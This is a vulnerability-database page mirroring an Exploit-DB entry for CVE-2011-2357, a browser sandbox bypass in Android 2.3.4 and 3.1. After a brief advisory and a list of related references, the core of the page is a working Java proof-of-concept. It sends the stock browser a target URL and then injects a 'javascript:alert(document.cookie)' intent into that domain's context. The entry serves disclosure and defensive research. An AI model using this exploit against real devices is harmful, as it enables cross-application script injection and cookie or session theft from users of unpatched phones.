Lucene search
+L

Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass

🗓️ 02 Aug 2011 00:00:00Reported by Roee HayType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

Open Handset Alliance Android 2.3.4/3.1 Browser Sandbox Security Bypass Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Google Android Operating System 2.3.4 / 3.1 Sandbox Bypass Vulnerability
2 Aug 201100:00
nessus
android
android
Browser Cross-App Scripting
31 Jul 201100:00
android
circl
Circl
CVE-2011-2357
2 Aug 201100:00
circl
cve
CVE
CVE-2011-2357
12 Aug 201118:00
cve
cvelist
Cvelist
CVE-2011-2357
12 Aug 201118:00
cvelist
euvd
EUVD
EUVD-2011-2346
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-2357
12 Aug 201118:55
nvd
packetstorm
Packet Storm
Android Browser Cross Application Scripting
2 Aug 201100:00
packetstorm
packetstorm
Packet Storm
Dolphin Browser HD Cross Application Scripting
21 Sep 201100:00
packetstorm
prion
Prion
Cross site scripting
12 Aug 201118:55
prion
Rows per page
source: https://www.securityfocus.com/bid/48954/info

Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.

Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.

Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected.

public class CasExploit extends Activity
{
   static final String mPackage = "com.android.browser";
   static final String mClass = "BrowserActivity";
   static final String mUrl = "http://target.domain/";;
   static final String mJavascript = "alert(document.cookie)";
   static final int mSleep = 15000;

   @Override
   public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      startBrowserActivity(mUrl);
         try {
             Thread.sleep(mSleep);
         }
         catch (InterruptedException e) {}
         startBrowserActivity("javascript:" + mJavascript);
   }

   private void startBrowserActivity(String url) {
      Intent res = new Intent("android.intent.action.VIEW");
      res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
      res.setData(Uri.parse(url));
      startActivity(res);
   }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.04615
27